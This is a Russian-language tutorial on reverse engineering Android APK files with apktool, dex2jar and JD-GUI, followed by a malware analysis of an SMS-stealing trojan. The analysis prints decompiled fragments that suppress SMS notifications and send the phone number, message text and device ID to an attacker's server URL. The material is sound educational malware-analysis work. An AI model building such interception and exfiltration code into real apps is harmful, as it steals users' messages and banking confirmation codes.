Освой Android играючи

Сайт Александра Климова

Шкодим

/* Моя кошка замечательно разбирается в программировании. Стоит мне объяснить проблему ей - и все становится ясно. */
John Robbins, Debugging Applications, Microsoft Press, 2000

Реверс-инжиниринг

Вы потеряли исходник своей программы и вам нужно восстановить код. Вы скачали программу с вирусом и хотите узнать, что он делает.

Программы под Android распространяются в архивах. Эти архивы имеют расширение ".apk". Такие файлы не шифруются и являются по сути файлами «zip». Можете переименовать apk-файл в zip, чтобы убедиться в этом.

Вам необходимо поковыряться в APK-файле и получить какие-то данные. Можно потренироваться на кошках. Возьмём свою программу "Hello Kitty", найдём его apk-файл в папке проекта app\build\outputs\apk и переместим в отдельную папку для опытов.

Вы можете также получить apk-файл с устройства и перенести его на компьютер при помощи команд ADB

Распаковав архив, вы можете увидеть структуру приложения и встретить знакомые файлы. И даже извлечь некоторые файлы для просмотра. К примеру, в папке res/drawable-hdpi-v4 я нашёл свою картинку pinkhellokitty.png. Казалось бы, вот оно - счастье. Но погодите радоваться. Если с изображениями проблем нет, то с чтением XML-файл вас ждёт облом. Какие-то строки вам видны, но в целом текст совершенно нечитаем. Поэтому сначала пойдём другим путём.

Так как пользовательские приложения для Android выполняются в java-машине, то APK-файлы наследуют все характерные черты JAR-файлов.

Содержимое архива обычно выглядит примерно так:

Строение apk-файла

Каталог META-INF содержит:

CERT.RSA — сертификат приложения
CERT.SF — контрольные суммы файлов ресурсов (картинок, звуков и т.д.)
MANIFEST.MF — служебная информация, описывающая сам apk-файл

Каталог res содержит ресурсы — значки в нескольких разрешениях, описание размещения элементов на форме в xml-файле.

AndroidManifest.xml — служебная информация о приложении. В этом файле содержатся и так называемые «permission» — разрешения, которые требуются для работы приложения (например, доступ к сети или доступ к телефонной книге).

classes.dex — исполняемый код приложения. Именно этот файл интересует нас в первую очередь.

resources.arsc — таблица ресурсов. В этом файле собраны xml-описания всех ресурсов.

Вот и вся краткая информация, которую нужно знать, приступая к разбору вредоносных программ под Android.

Теперь рассмотрим популярные утилиты, используемые для изучения программ.

Apktool

Для начала скачиваем утилиту Apktool, который представляет собой jar-файл с номером версии. Для удобства переименовываем его в короткий вид apktool.jar, так как будем работать в командной строке. Подопытный файл разместите в той же папке с утилитой.

Запускаем в окне командной строки утилиту с флагом d:


>apktool d app-debug.apk

Появится отдельная папка, имя которой будет совпадать с именем вашего файла. Зайдите в неё и исследуйте файлы. Вы заметите, что XML-файлы теперь доступны для чтения в нормальном виде. Таким образом, мы можем открыть файл activity_main.xml и узнать разметку своей активности.

В папке вы также найдёте множество системных файлов, которые проект тянет с собой при создании приложения. На них не обращаем внимания. Вам нужно искать только те файлы, которые создавали программисты, хакеры, вы.

При изучении своей или чужой программы вам надо посмотреть на файл манифеста, чтобы узнать используемые разрешения, список активностей, сервисов и т.д. А в папке res изучить все ресурсы, относящиеся к программе.

Моя тестовая программа была слишком проста. В других примерах могут быть дополнительные папки, например, assets, которая может содержать файлы, картинки и т.д. Там могут находиться html-файлы с сценариями на Javascript, которые ведут на вредные страницы.

В папке smali находятся уже файлы классов с тем же расширением smali. Код выглядит как в ассемблере и при желании можно понять листинг, но очень неудобно. Оставив файлы пока в покое.

Первую часть задачи мы выполнили.

dex2jar

Вторая утилита dex2jar, позволяет преобразовать файлы dex в jar. Скачиваем последнюю версию и распаковываем архив утилиты. Утилита содержит множество файлов для различных ситуаций. Можете поизучать их на досуге.

Запускаем команду d2j-dex2jar.bat app-debug.apk и получаем на выходе файл app-debug-dex2jar.jar. Это стандартный тип файлов для Java, но для нас пока не слишком полезный. Тем не менее мы выполнили второй шаг и получили промежуточный файл.

JD-GUI

Утилита, которая поможет нам прочитать jar-файл, называется JD-GUI. На странице разработчика можно найти ссылки на плагины к средам разработки и даже онлайн-версию.

Скачиваем последнюю версию и распаковываем архив. Там всего два файла - исполняемый exe-файл и readme.txt

Запускаем программу и перетаскиваем на него jar-файл. И весь код на ладони.

Обратите внимание, что код немного будет отличаться. Например, код в студии:


mHelloTextView = (TextView) findViewById(R.id.textView);

Сравните с кодом в утилите.


this.mHelloTextView = ((TextView)findViewById(2131230784));

Иными словами, вместо констант из класса R подставляются их реальные значения. Вам придётся попотеть, чтобы сопоставить данные. Но вы справитесь, я в вас верю.

Burp Suite

Burp Suite позволит вам просматривать HTTP-траффик на эмуляторе. Скачайте последнюю версию.

Далее следует настроить прокси и другие параметры.

Разбор вредоносной программы

Источник: Разбор вредоносной программы под Android на примере Trojan-Spy.AndroidOS.Zbot.a / Android.Smssniffer / Android/SpySMS / AndroidOS_SMSREP.B

В качестве примера возьмем программу suspicious.apk, который детектируется разными антивирусами как вредоносная программа.

Чтобы лучше понять, что именно искать, нужно проанализировать файл «AndroidManifest.xml» — посмотреть, какие именно разрешения требуются анализируемому приложению. Данный файл бинарный, а не обычный текстовый xml. Для того, чтобы его прочитать нужно воспользоваться консольной утилитой «aapt» из комплекта Android SDK. Она находится в каталоге «platform-tools». Так как графического интерфейса нет, то команду нужно вводить в консоли. Например, для Windows:

C:\android-sdk-windows\platform-tools\aapt.exe l -a C:\incoming\suspicious.apk

Разумеется, вы должны подставить свои пути. В Linux команда будет такой же с очевидными отличиями (не будет букв дисков и расширения «exe» у утилиты). Для большего удобства вывод можно перенаправить в файл:

C:\android-sdk-windows\platform-tools\aapt.exe l -a C:\incoming\suspicious.apk>>C:\incoming\manifest.txt

В файле нужно найти секцию «Android manifest» и искать перечисление разрешений. В анализируемом файле это выглядит так:

"android.permission.READ_PHONE_STATE" (Raw: "android.permission.READ_PHONE_STATE")

"android.permission.INTERNET" (Raw: "android.permission.INTERNET")

"android.permission." (Raw: "android.permission.RECEIVE_SMS")

Из этой информации становится понятно, что программа может получать состояние телефона (сюда включаются, например «телефон в режиме вызова», «телефон в режиме принятия данных»). Это разрешение нужно и для получения номера телефона, на котором запущена программа, работать с сетью и мониторить приход СМС. На этих аспектах и нужно сосредоточить внимание при дальнейшем анализе.

Для того, чтобы получить доступ к коду нужно выполнить два шага — преобразовать apk-файл в jar-файл и декомпилировать полученный байткод в более понятный для человека вид.

Воспользуемся конвертером «dex2jar»:

C:\dex2jar\dex2jar.bat C:\incoming\suspicious.apk

Сконвертированный файл будет находится в том же каталоге, что и оригинальный файл. К его имени будет добавлено ".dex2jar.jar", то есть в данном примере это будет «suspicious.apk.dex2jar.jar».

Этот файл можно открыть декомпилятором. Иерархия пакета в окне декомпилятора выглядит так:

На этом подготовительные шаги заканчиваются — дальнейший успех зависит только от вашего знания Java и умения пользоваться поисковиком.

К счастью, экземпляр выбранный для примера имеет довольно скромные размеры — финальный jar всего 7,01 KB.

В программе всего шесть классов. Исключим те, которые не представляют интереса. Это класс R, в котором только перечислены идентификаторы всех ресурсов. Так же из рассмотрения можно исключить класс Config, в котором содержится конфигурация сборки.

Рассмотрим подробнее оставшиеся три класса.

Activation

Листинг кода

Этот класс срабатывает по событию onCreate(), то есть сразу после старта приложения.

TelephonyManager localTelephonyManager = (TelephonyManager)getSystemService("phone"); — создает localTelephonyManager, в которую помещает данные об устройстве.

str1 = localTelephonyManager.getDeviceId(); — выбирает из полученных данных идентификационный номер устройства и помещает его в строку str1

Дальше идет цикл, который делит DeviceId на кусочки по четыре цифры, вставляя между ними дефис "-", то есть из XXXXXXXXXXXXXXXX получается XXXX-XXXX-XXXX-XXXX. Полученную строку цифр и дефисов передают в TextView с идентификатором 2131034112.

SmsReciever

Листинг кода

Этот класс срабатывает при приходе СМС-сообщения, событие onReceive().

В задачу этого класса входит отслеживать входящие смс и в случае обнаружения запускать класс MainService, передавая ему указатель на новое пришедшее сообщение.

MainService

Этот класс довольно велик, поэтому не стану приводить его целиком. Сразу после вызова запускает субкласс «SmsBlockerThread», который блокирует уведомление о поступившем СМС, чтобы пользователь не был оповещен о новом входящем СМС.

Затем входящее СМС обрабатывается таким образом:

Листинг кода

String str1 = localSmsMessage.getOriginatingAddress(); — номер телефона-получателя (то есть номер телефона, на котором установлен троянец) помещается в переменную str1.

String str2 = localSmsMessage.getMessageBody(); — тело сообщения помещается в переменную str2

Затем создаются связанные пары localBasicNameValuePair1 и localBasicNameValuePair2 в которые помещаются значения

f0=<номер телефона>
b0=<текст сообщения>

Эти пары сохраняют в массив localArrayList, в который позже добавляют пару localBasicNameValuePair3, представляющую собой id=<id устройства>

Листинг кода

При этом, как видите, DeviceId получается заново, а не используется то, что было получено в классе Activation. Заканчивается тем, что вызывается метод postRequest() из последнего класса ServerSession:


try
{
    JSONObject localJSONObject = ServerSession.postRequest(new UrlEncodeFormEntity(localArrayList));
	return;
}

В качестве параметра передается тот самый массив пар, в котором номер телефона, содержимое СМС и идентификатор устройства.

ServerSession

Этот класс имеет два метода: initUrl(), который возвращает часть ссылки "(http://softthrifty.com/security.jsp)":


public static String initUrl()
{
    return "http://softthrifty.com/security.jsp";
}

и большой метод postRequest(), который вызывался из класса MainService. Несмотря на размер, задача postRequest() проста — отправить на сервер по ссылке, возвращаемой методом initUrl(), данные, добавив пары из массива, собранного в MainService. То есть всего лишь обратиться по ссылке:

(http://softthrifty.com/security.jsp?f0=<номер телефона>&b0=<текст сообщения>&id=<id устройства>)

Итог

Итак, данный троянец перехватывает СМС и отправляет на сервер запрос, в котором передает номер зараженного телефона, содержимое СМС и идентификатор зараженного телефона. Такое поведение может быть признаком банковского троянца, атакующего двухфакторную авторизацию. Для успешной атаки требуется выполнение таких условий:

1) злоумышленник должен заразить компьютер жертвы, чтобы перехватить данные для он-лайн банкинга;
2) злоумышленник должен заразить телефон жертвы для перехвата СМС с кодом подтверждения от банка;
3) злоумышленник должен каким-то образом связать пользователя зараженного компьютера и зараженного телефона, чтобы знать, от каких учетных данных он-лайн банкинга данный код подтверждения;

В силу своих размеров и очевидности производимой деятельности такой образец хорошо подходит для демонстрации базовых приемов разбора вредоносных программ под Андроид.